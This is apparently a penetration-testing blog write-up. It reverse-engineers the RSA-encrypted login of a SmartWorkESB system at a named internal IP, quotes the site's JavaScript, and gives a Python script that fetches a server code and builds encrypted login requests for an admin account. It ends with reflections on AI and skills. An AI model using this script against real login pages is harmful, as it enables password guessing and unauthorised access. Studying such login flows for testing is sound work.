1. “Seeing Flowers in the Fog”
Error in replaying the login interface:

It seems to be related to RSA encryption. Why RSA? Just a feeling~~
```y9uN67EfI6s5KtHsQSxQ6XDq0MSYnON9XzZmTOXlN3gzGq13%2B5iZ0MmMXLq7ypgoPTr0NN7wnpjHHNbDcfVS/4Eda24Mjf8qgs%2BXX7a470iGyn8oh7S6Ha7QHMIyt9EQ1Oi1KNNSEidngzJB4y/V7jebeXjhaRZNqsPvbQRYSuA%3D```
URL Decoding
```y9uN67EfI6s5KtHsQSxQ6XDq0MSYnON9XzZmTOXlN3gzGq13+5iZ0MmMXLq7ypgoPTr0NN7wnpjHHNbDcfVS/4Eda24Mjf8qgs+XX7a470iGyn8oh7S6Ha7QHMIyt9EQ1Oi1KNNSEidngzJB4y/V7jebeXjhaRZNqsPvbQRYSuA=```
BASE64 Continue Decoding
```˛�#빪ѬA,P鰪Є蜣}_6fL奷x3�虐Ɍ\껊訽:䴞ޘǜփq咿ᝫn�⏗_港H抿(紺²瑐Ԩ娓R'g㲁㯕yxᩖMꃯmXJ```
2. “Analyzing in Detail”
Next, let’s analyze the login logic.
Encryption algorithm plugin:
http://172.18.252.116:8096/SmartWorkESB/js/jsencrypt.js
Login logic:
http://172.18.252.116:8096/SmartWorkESB/js/index.js
Basically, the client uses the public key for encryption, and the server uses the private key for decryption.
Returning to the password logic, the core code is as follows:
$(document).ready(function() { $("form:first").validate({ onfocusout: !1, onkeyup: !1, showErrors: function(a, b) { if (b && b[0]) { var c = smartwork.getLabel($(b[0].element)) + b[0].message; "" != c && smartwork.error(c) } } }); var d = function() { var a = $("form:first button"); smartwork.isReadOnly(a) || (smartwork.disable(a, !0), smartwork.hide(), $("form:first").valid() ? smartwork.ajax({ url: "pub/GetValidCode.do" }, function(b) { var c = new JSEncrypt; c.setPublicKey("MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDaHCIMidGANhTZQ2h+FtAfR0ZrojjRCxzUmYTNKJk/UXucMQYLAjQ31JffhZQRpsGfy3rkBdYJyJ8PNdsX243iPEuBfOeqc6b09Z+WaeNwvUy2LDFlvSarNcje5w0VOdD6o2cQwaqjGQRzoN9l+L/Yb2emqJBlY2Dvnf4CfJRyFwIDAQAB"); smartwork.ajax({ url: "pub/Login.do", data: { userName: $('form:first input[name="userName"]').val(), password: c.encrypt(b.root + $('form:first input[name="password"]').val()) } }, function(b) { smartwork.disable(a, !1); window.location = "main.html?v=" + Math.ceil(1E3 * Math.random()) }, function() { smartwork.disable(a, !1) }) }, function() { smartwork.disable(a, !1) }) : smartwork.disable(a, !1)) }; $("form:first button").click(function(a) { d() }); $("form:first input[name]").keyup(function(a) { 13 == a.keyCode && d() })});
3. "Clarifying the Encryption Logic"<br />Step 1: Call POST /SmartWorkESB/pub/GetValidCode.do to get the replay key value<br />var d = function() { var a = $("form:first button"); smartwork.isReadOnly(a) || (smartwork.disable(a, !0), smartwork.hide(), $("form:first").valid() ? smartwork.ajax({ url: "pub/GetValidCode.do" },<br /><br />Step 2: Then call the Login.do interface, the password field is RSA encrypted (key + password field)<br />function(b) { var c = new JSEncrypt; c.setPublicKey("MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDaHCIMidGANhTZQ2h+FtAfR0ZrojjRCxzUmYTNKJk/UXucMQYLAjQ31JffhZQRpsGfy3rkBdYJyJ8PNdsX243iPEuBfOeqc6b09Z+WaeNwvUy2LDFlvSarNcje5w0VOdD6o2cQwaqjGQRzoN9l+L/Yb2emqJBlY2Dvnf4CfJRyFwIDAQAB"); smartwork.ajax({ url: "pub/Login.do", data: { userName: $('form:first input[name="userName"]').val(), password: c.encrypt(b.root + $('form:first input[name="password"]').val()) } },<br /><br />Step 3: Validate the encryption algorithm<br />
4. "Complete POC Script" as follows:<br />#!/usr/bin/env python3<br /># -*- coding: utf-8 -*-<br />import requests<br />import base64<br />from Crypto.PublicKey import RSA<br />from Crypto.Cipher import PKCS1_v1_5<br /># ========== Configuration ==========<br />TARGET_HOST = "http://xxx.xxx.252.116:8096"<br />USERNAME = "admin" # Only for logging, not needed for encryption<br />PASSWORD = "123456" # The plaintext password to be encrypted<br /># Public key (PEM format, extracted from JS)<br />PUBLIC_KEY_PEM = """-----BEGIN PUBLIC KEY-----<br />MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDaHCIMidGANhTZQ2h+FtAfR0ZrojjRCxzUmYTNKJk/UXucMQYLAjQ31JffhZQRpsGfy3rkBdYJyJ8PNdsX243iPEuBfOeqc6b09Z+WaeNwvUy2LDFlvSarNcje5w0VOdD6o2cQwaqjGQRzoN9l+L/Yb2emqJBlY2Dvnf4CfJRyFwIDAQAB<br />-----END PUBLIC KEY-----"""<br /># ========== Functions ==========<br />def get_valid_code():<br /> url = f"{TARGET_HOST}/SmartWorkESB/pub/GetValidCode.do"<br /> headers = {<br /> "X-Requested-With": "XMLHttpRequest",<br /> "Referer": f"{TARGET_HOST}/SmartWorkESB/index.html?v=363"<br /> }<br /> resp = requests.post(url, headers=headers)<br /> resp.raise_for_status()<br /> data = resp.json()<br /> if data.get("success") and "root" in data:<br /> return data["root"]<br /> else:<br /> raise RuntimeError(f"Failed to get validCode: {data}")<br />def rsa_encrypt_pkcs1_v1_5(plaintext: str, public_key_pem: str) -> str:<br /> key = RSA.import_key(public_key_pem)<br /> cipher = PKCS1_v1_5.new(key)<br /> ciphertext = cipher.encrypt(plaintext.encode("utf-8"))<br /> return base64.b64encode(ciphertext).decode("ascii")<br /># ========== Main Process ==========<br />if __name__ == "__main__":<br /> try:<br /> print(f"[>] Target: {TARGET_HOST}")<br /> print(f"[>] Encrypting password for user: {USERNAME}")<br /> # Step 1: Get validCode (root)<br /> root = get_valid_code()<br /> print(f"[+] ValidCode (root): {root}")<br /> # Step 2: Concatenate plaintext<br /> plaintext = root + PASSWORD<br /> print(f"[+] Plaintext (root + password): {plaintext}")<br /> # Step 3: RSA encryption (PKCS#1 v1.5)<br /> encrypted_b64 = rsa_encrypt_pkcs1_v1_5(plaintext, PUBLIC_KEY_PEM)<br /> print(f"[+] Encrypted (Base64):\n{encrypted_b64}")<br /> # Step 4: URL encoding (can be directly used for POST form)<br /> from urllib.parse import quote<br /> encrypted_urlencoded = quote(encrypted_b64)<br /> print(f"\n[>] Login Form Data:")<br /> print(f"userName={USERNAME}&password={encrypted_urlencoded}")<br /> except Exception as e:<br /> print(f"[!] Error: {e}")
In conclusion:
The golden path in the AI era is no longer: learn a skill → accumulate experience → become an expert.
This path has been directly “accelerated – compressed – replaced” by AI.
The future starting point will be: centered on cognition → driving structural understanding → then mobilizing AI to complete skill implementation.